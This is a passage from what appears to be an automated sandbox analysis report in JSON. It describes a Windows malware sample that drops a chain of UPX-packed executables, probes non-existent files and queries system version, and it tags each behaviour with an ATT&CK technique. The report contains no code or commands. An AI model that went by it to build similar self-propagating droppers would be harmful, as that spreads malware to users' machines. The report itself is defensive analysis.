\"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" trying to touch file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" trying to touch file \"c:\\ui\\SwDRM.dll\"\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" trying to touch file \"C:\\Windows\\System32\\imm32.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"620006.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"lvhxj.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"pthnb.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"00802.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"660202.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"trrtd.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"pdrvn.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"xjdpttx.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"208464.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"82064.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"886408.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"42242.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" writes file \"c:\\620006.exe\"\n \"620006.exe\" writes file \"c:\\lvhxj.exe\"\n \"lvhxj.exe\" writes file \"c:\\pthnb.exe\"\n \"pthnb.exe\" writes file \"c:\\00802.exe\"\n \"00802.exe\" writes file \"c:\\660202.exe\"\n \"660202.exe\" writes file \"c:\\trrtd.exe\"\n \"trrtd.exe\" writes file \"c:\\pdrvn.exe\"\n \"pdrvn.exe\" writes file \"c:\\xjdpttx.exe\"\n \"xjdpttx.exe\" writes file \"c:\\208464.exe\"\n \"208464.exe\" writes file \"c:\\82064.exe\"\n \"82064.exe\" writes file \"c:\\886408.exe\"\n \"886408.exe\" writes file \"c:\\42242.exe\"\n \"42242.exe\" writes file \"c:\\848482.exe\"\n \"848482.exe\" writes file \"c:\\06462.exe\"\n \"06462.exe\" writes file \"c:\\2688428.exe\"\n \"2688428.exe\" writes file \"c:\\0882288.exe\"\n \"0882288.exe\" writes file \"c:\\642824.exe\"\n \"642824.exe\" writes file \"c:\\rjjxrvl.exe\"\n \"rjjxrvl.exe\" writes file \"c:\\pdtrht.exe\"\n \"pdtrht.exe\" writes file \"c:\\lvvjfph.exe\"\n \"lvvjfph.exe\" writes file \"c:\\drlrf.exe\"\n \"drlrf.exe\" writes file \"c:\\xdhfnxr.exe\"\n \"xdhfnxr.exe\" writes file \"c:\\drjtt.exe\"\n \"drjtt.exe\" writes file \"c:\\6886668.exe\"\n \"6886668.exe\" writes file \"c:\\42042.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"ffffffr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"lvhrb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"bfltjr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"htplvld.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"024046.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4088402.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"046486.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"282482.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"pljnf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"thdjjv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"hhbbtl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hhbbtl.exe]- [targetUID: 00000000-00002204]\n \"884648.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\884648.exe]- [targetUID: 00000000-00003536]\n \"82440.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\82440.exe]- [targetUID: 00000000-00003536]\n \"648086.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\648086.exe]- [targetUID: 00000000-00002308]\n \"bnbhnh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\bnbhnh.exe]- [targetUID: 00000000-00002676]\n \"rjlbldf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rjlbldf.exe]- [targetUID: 00000000-00002676]\n \"dndhhn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dndhhn.exe]- [targetUID: 00000000-00003816]\n \"688844.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\688844.exe]- [targetUID: 00000000-00003816]\n \"464204.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\464204.exe]- [targetUID: 00000000-00001668]\n \"442444.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\442444.exe]- [targetUID: 00000000-00000820]\n \"644444.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\644444.exe]- [targetUID: 00000000-00000820]\n \"26400.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\26400.exe]- [targetUID: 00000000-00001404]\n \"286488.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\286488.exe]- [targetUID: 00000000-00001404]\n \"482480.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\482480.exe]- [targetUID: 00000000-00000624]\n \"062028.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\062028.exe]- [targetUID: 00000000-00000624]\n \"08406.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\08406.exe]- [targetUID: 00000000-00001828]\n \"024668.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\024668.exe]- [targetUID: 00000000-00003328]\n \"86620.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\86620.exe]- [targetUID: 00000000-00003328]\n \"44664.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\44664.exe]- [targetUID: 00000000-00000344]\n \"860482.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\860482.exe]- [targetUID: 00000000-00001408]\n \"08240.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\08240.exe]- [targetUID: 00000000-00001408]\n \"60644.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\60644.exe]- [targetUID: 00000000-00003240]\n \"226448.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\226448.exe]- [targetUID: 00000000-00003280]\n \"64288.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\64288.exe]- [targetUID: 00000000-00001688]\n \"42402.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\42402.exe]- [targetUID: 00000000-00001688]\n \"4222660.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4222660.exe]- [targetUID: 00000000-00003072]\n \"fjtbx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fjtbx.exe]- [targetUID: 00000000-00002332]\n \"ndhlfdh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ndhlfdh.exe]- [targetUID: 00000000-00006088]\n \"hlrdfx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hlrdfx.exe]- [targetUID: 00000000-00006088]\n \"xddtpjj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xddtpjj.exe]- [targetUID: 00000000-00003716]\n \"880446.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\880446.exe]- [targetUID: 00000000-00002604]\n \"026424.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\026424.exe]- [targetUID: 00000000-00003876]\n \"64402.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\64402.exe]- [targetUID: 00000000-00003876]\n \"62440.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\62440.exe]- [targetUID: 00000000-00003628]\n \"64268.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\64268.exe]- [targetUID: 00000000-00004048]\n \"fnnxblt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fnnxblt.exe]- [targetUID: 00000000-00002952]\n \"txjxfrd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\txjxfrd.exe]- [targetUID: 00000000-00002952]\n \"blvpbn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\blvpbn.exe]- [targetUID: 00000000-00002880]\n \"thpxfjv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\thpxfjv.exe]- [targetUID: 00000000-00002472]\n \"42042.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\42042.exe]- [targetUID: 00000000-00002868]\n \"6886668.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6886668.exe]- [targetUID: 00000000-00003636]\n \"drjtt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\drjtt.exe]- [targetUID: 00000000-00003636]\n \"xdhfnxr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xdhfnxr.exe]- [targetUID: 00000000-00003512]\n \"drlrf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\drlrf.exe]- [targetUID: 00000000-00001168]\n \"lvvjfph.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lvvjfph.exe]- [targetUID: 00000000-00003576]\n \"pdtrht.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pdtrht.exe]- [targetUID: 00000000-00004264]\n \"rjjxrvl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rjjxrvl.exe]- [targetUID: 00000000-00004264]\n \"642824.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\642824.exe]- [targetUID: 00000000-00004012]\n \"0882288.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0882288.exe]- [targetUID: 00000000-00003800]\n \"2688428.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2688428.exe]- [targetUID: 00000000-00003800]\n \"06462.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\06462.exe]- [targetUID: 00000000-00002968]\n \"848482.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\848482.exe]- [targetUID: 00000000-00006040]\n \"42242.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\42242.exe]- [targetUID: 00000000-00006040]\n \"886408.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\886408.exe]- [targetUID: 00000000-00004116]\n \"82064.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\82064.exe]- [targetUID: 00000000-00006080]\n \"208464.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\208464.exe]- [targetUID: 00000000-00006080]\n \"xjdpttx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xjdpttx.exe]- [targetUID: 00000000-00005976]\n \"pdrvn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pdrvn.exe]- [targetUID: 00000000-00006132]\n \"trrtd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\trrtd.exe]- [targetUID: 00000000-00006132]\n \"660202.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\660202.exe]- [targetUID: 00000000-00005888]\n \"00802.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\00802.exe]- [targetUID: 00000000-00005868]\n \"pthnb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pthnb.exe]- [targetUID: 00000000-00005896]\n \"lvhxj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lvhxj.exe]- [targetUID: 00000000-00005816]\n \"620006.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\620006.exe]- [targetUID: 00000000-00006020]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "static-5", "relevance": 10, "name": "PE file contains zero-size sections", "description": "Raw size of \"UPX0\" is zero", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" called \"IsWow64Process\" with parameter \"6020\" - (UID: 00000000-00006020)\n \"620006.exe\" called \"IsWow64Process\" with parameter \"5816\" - (UID: 00000000-00005816)\n \"lvhxj.exe\" called \"IsWow64Process\" with parameter \"5952\" - (UID: 00000000-00005952)\n \"pthnb.exe\" called \"IsWow64Process\" with parameter \"5896\" - (UID: 00000000-00005896)\n \"pdrvn.exe\" called \"IsWow64Process\" with parameter \"5976\" - (UID: 00000000-00005976)\n \"xjdpttx.exe\" called \"IsWow64Process\" with parameter \"4296\" - (UID: 00000000-00004296)\n \"06462.exe\" called \"IsWow64Process\" with parameter \"2968\" - (UID: 00000000-00002968)\n \"2688428.exe\" called \"IsWow64Process\" with parameter \"3800\" - (UID: 00000000-00003800)\n \"642824.exe\" called \"IsWow64Process\" with parameter \"4012\" - (UID: 00000000-00004012)\n \"rjjxrvl.exe\" called \"IsWow64Process\" with parameter \"4264\" - (UID: 00000000-00004264)\n \"lvvjfph.exe\" called \"IsWow64Process\" with parameter \"3784\" - (UID: 00000000-00003784)\n \"drlrf.exe\" called \"IsWow64Process\" with parameter \"1168\" - (UID: 00000000-00001168)\n \"xdhfnxr.exe\" called \"IsWow64Process\" with parameter \"3512\" - (UID: 00000000-00003512)\n \"drjtt.exe\" called \"IsWow64Process\" with parameter \"3636\" - (UID: 00000000-00003636)\n \"6886668.exe\" called \"IsWow64Process\" with parameter \"2868\" - (UID: 00000000-00002868)\n \"42042.exe\" called \"IsWow64Process\" with parameter \"2472\" - (UID: 00000000-00002472)\n \"thpxfjv.exe\" called \"IsWow64Process\" with parameter \"3780\" - (UID: 00000000-00003780)\n \"fnnxblt.exe\" called \"IsWow64Process\" with parameter \"2240\" - (UID: 00000000-00002240)\n \"62440.exe\" called \"IsWow64Process\" with parameter \"3628\" - (UID: 00000000-00003628)\n \"026424.exe\" called \"IsWow64Process\" with parameter \"2604\" - (UID: 00000000-00002604)\n \"xddtpjj.exe\" called \"IsWow64Process\" with parameter \"3716\" - (UID: 00000000-00003716)\n \"ndhlfdh.exe\" called \"IsWow64Process\" with parameter \"3288\" - (UID: 00000000-00003288)\n \"fjtbx.exe\" called \"IsWow64Process\" with parameter \"2332\" - (UID: 00000000-00002332)\n \"64288.exe\" called \"IsWow64Process\" with parameter \"3280\" - (UID: 00000000-00003280)\n \"226448.exe\" called \"IsWow64Process\" with parameter \"3240\" - (UID: 00000000-00003240)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006020)\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000220000b92200fbb82200000000000000000000001b00000000011ce312000000000080f0120095e14c77253a0700feffffff435c507750595077aa000000b8000000fab82200f8b82200a4e41200dce81200000000000000000000000000000000000000000000000000001a000000001b001c5c4f7760d86275ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed507722b92200a06a267586000000a4e41200dce812000000000086008800a06a2675a4e41200916c267522b92200a06a2675a06a267514e9120002020000 (UID: 00000000-00006020)\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006020)\n \"620006.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005816)\n \"620006.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002e00706d2e006b6d2e00000000000000000000002c0000000001ecdf12000000000050ed120095e14c77213f0700feffffff435c507750595077aa000000b80000006a6d2e00686d2e0074e11200ace5120000000000000000000000000000000000000000000000000000000000000000001c5c4f7760d86275ffffffff1700000024e11200240000000300000014e6120040eb1200ace512008600000050e1120096ed5077926d2e00a06a26758600000074e11200ace512000000000086008800a06a267574e11200916c2675926d2e00a06a2675a06a2675e4e5120002020000 (UID: 00000000-00005816)\n \"620006.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005816)\n \"lvhxj.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005952)\n \"lvhxj.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001d00b02c1d00ab2c1d00000000000000000000001500000000011ce312000000000080f0120095e14c7797200700feffffff435c507750595077aa000000b8000000aa2c1d00a82c1d00a4e41200dce81200000000000000000000000000000000000000000000000000e0190000000015001c5c4f7760d86275ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed5077d22c1d00a06a267586000000a4e41200dce812000000000086008800a06a2675a4e41200916c2675d22c1d00a06a2675a06a267514e9120002020000 (UID: 00000000-00005952)\n \"lvhxj.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005952)\n \"pthnb.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005896)\n \"pthnb.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002200686d2200636d220000000000000000000000200000000001ecdf12000000000050ed120095e14c7768260700feffffff435c507750595077aa000000b8000000626d2200606d220074e11200ace5120000000000000000000000000000000000000000000000000000000000000000001c5c4f7760d86275ffffffff1700000024e11200240000000300000014e6120040eb1200ace512008600000050e1120096ed50778a6d2200a06a26758600000074e11200ace512000000000086008800a06a267574e11200916c26758a6d2200a06a2675a06a2675e4e5120002020000 (UID: 00000000-00005896)\n \"pthnb.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005896)\n \"00802.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000006a00082f6a00032f6a00000000000000000000006200000000011ce312000000000080f0120095e14c77e4280700feffffff435c507750595077aa000000b8000000022f6a00002f6a00a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5c4f7760d86275ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed50772a2f6a00a06a267586000000a4e41200dce812000000000086008800a06a2675a4e41200916c26752a2f6a00a06a2675a06a267514e9120002020000 (UID: 00000000-00005868)\n \"00802.exe\" called \"RtlGetVersion\" with parameter 